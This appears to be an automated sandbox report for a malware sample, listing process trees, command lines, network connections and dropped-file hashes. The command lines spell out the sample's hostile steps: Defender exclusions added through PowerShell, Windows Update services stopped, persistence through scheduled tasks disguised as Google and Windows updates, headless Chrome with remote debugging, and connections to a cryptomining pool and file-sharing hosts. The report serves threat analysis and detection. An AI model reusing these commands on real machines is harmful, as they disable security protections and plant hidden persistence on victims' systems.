PID 4796 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4796 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4796 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3716 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3716 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 3608 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 3608 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 5052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 4952 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 4952 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe

"C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 288

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=24408 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data9LVLT" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7fff8d989758,0x7fff8d989768,0x7fff8d989778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1164 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=856 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=24408 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1836 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2296 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2460 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3040 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3224 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=24408 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3368 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3352 --field-trial-handle=1388,i,12283925307727663872,9608416345530855972,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3d0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#ncuutrkdsmtxr#> powershell <#ncuutrkdsmtxr#> -Verb <#ncuutrkdsmtxr#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 11:15 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 11:15 /f /tn WindowsSecurityUpdate_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 163.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 127.0.0.1:24408 tcp
N/A 127.0.0.1:24408 tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 apis.google.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 ogs.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.150:443 i.ytimg.com tcp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 150.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 34.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
N/A 127.0.0.1:24408 tcp
N/A 127.0.0.1:24408 tcp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
NL 142.250.179.150:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:80 pastebin.com tcp
US 172.67.34.170:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 154.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

memory/4796-117-0x0000000003370000-0x0000000003399000-memory.dmp

memory/4796-118-0x0000000003520000-0x000000000355F000-memory.dmp

memory/4796-119-0x0000000000400000-0x00000000018CF000-memory.dmp

memory/4796-120-0x0000000003990000-0x00000000039C8000-memory.dmp

memory/4796-121-0x0000000073850000-0x0000000073F3E000-memory.dmp

memory/4796-122-0x0000000005F60000-0x0000000005F70000-memory.dmp

memory/4796-123-0x0000000005F60000-0x0000000005F70000-memory.dmp

memory/4796-124-0x0000000005F60000-0x0000000005F70000-memory.dmp

memory/4796-125-0x0000000005F70000-0x000000000646E000-memory.dmp

memory/4796-126-0x0000000003A10000-0x0000000003A44000-memory.dmp

memory/4796-127-0x0000000005F50000-0x0000000005F56000-memory.dmp

memory/4796-128-0x0000000006670000-0x0000000006C76000-memory.dmp

memory/4796-129-0x0000000006CC0000-0x0000000006DCA000-memory.dmp

memory/4796-130-0x0000000005F60000-0x0000000005F70000-memory.dmp

memory/4796-131-0x0000000006E00000-0x0000000006E12000-memory.dmp

memory/4796-132-0x0000000006E20000-0x0000000006E5E000-memory.dmp

memory/4796-133-0x0000000006EC0000-0x0000000006F0B000-memory.dmp

memory/4796-134-0x0000000003370000-0x0000000003399000-memory.dmp

memory/4796-135-0x0000000000400000-0x00000000018CF000-memory.dmp

memory/4796-136-0x0000000003520000-0x000000000355F000-memory.dmp

memory/4796-137-0x0000000073850000-0x0000000073F3E000-memory.dmp

memory/4796-138-0x0000000007000000-0x0000000007076000-memory.dmp

memory/4796-139-0x0000000007080000-0x0000000007112000-memory.dmp

memory/4796-140-0x0000000007120000-0x0000000007186000-memory.dmp

memory/4796-141-0x0000000005F60000-0x0000000005F70000-memory.dmp

memory/4796-142-0x0000000005F60000-0x0000000005F70000-memory.dmp

memory/4796-143-0x0000000005F60000-0x0000000005F70000-memory.dmp

memory/4796-144-0x0000000008C80000-0x0000000008E42000-memory.dmp

memory/4796-146-0x0000000005F60000-0x0000000005F70000-memory.dmp

memory/4796-145-0x0000000008E50000-0x000000000937C000-memory.dmp

memory/4796-147-0x0000000007E70000-0x0000000007EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

memory/504-159-0x0000000000020000-0x00000000002AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/1944-167-0x0000000000400000-0x0000000000527000-memory.dmp

memory/4420-174-0x00007FF7899C0000-0x00007FF78AC25000-memory.dmp

memory/1944-178-0x0000000000400000-0x0000000000527000-memory.dmp

memory/504-179-0x0000000000020000-0x00000000002AB000-memory.dmp

memory/1944-183-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

memory/1944-185-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/4420-182-0x00007FFF9C3F0000-0x00007FFF9C5CB000-memory.dmp

memory/1944-180-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

memory/1944-187-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

memory/4420-186-0x00007FF7899C0000-0x00007FF78AC25000-memory.dmp

memory/1944-193-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

memory/1944-190-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

memory/3716-189-0x00000000013E0000-0x0000000001A14000-memory.dmp

memory/1944-194-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

memory/3716-195-0x00000000777C4000-0x00000000777C5000-memory.dmp

memory/4420-192-0x00007FF7899C0000-0x00007FF78AC25000-memory.dmp

memory/4796-196-0x0000000000400000-0x00000000018CF000-memory.dmp

memory/1944-202-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

memory/4420-200-0x00007FF7899C0000-0x00007FF78AC25000-memory.dmp

memory/1944-204-0x00000000FEDF0000-0x00000000FEE00000-memory.dmp

